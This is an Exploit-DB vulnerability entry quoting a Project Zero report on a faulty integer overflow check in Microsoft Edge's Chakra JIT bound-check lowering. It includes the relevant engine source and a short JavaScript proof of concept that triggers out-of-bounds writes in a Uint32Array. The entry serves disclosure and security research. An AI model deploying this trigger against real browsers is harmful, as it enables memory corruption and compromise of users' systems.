Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check

EDB-ID:

43153




Platform:

Windows

Date:

2017-11-16


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343

Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
    ...
    if(rightOpnd->IsIntConstOpnd())
    {
        IntConstType newOffset;
        if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
        {
            offset = newOffset;
            rightOpnd = nullptr;
            offsetOpnd = nullptr;
        }
    }
    ...
    if(!rightOpnd)
    {
        rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
    }
}

At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.

PoC:
*/

function f() {
    let arr = new Uint32Array(0x1000);
    for (let i = 0; i < 0x7fffffff;) {
        arr[++i] = 0x1234;
    }
}

f();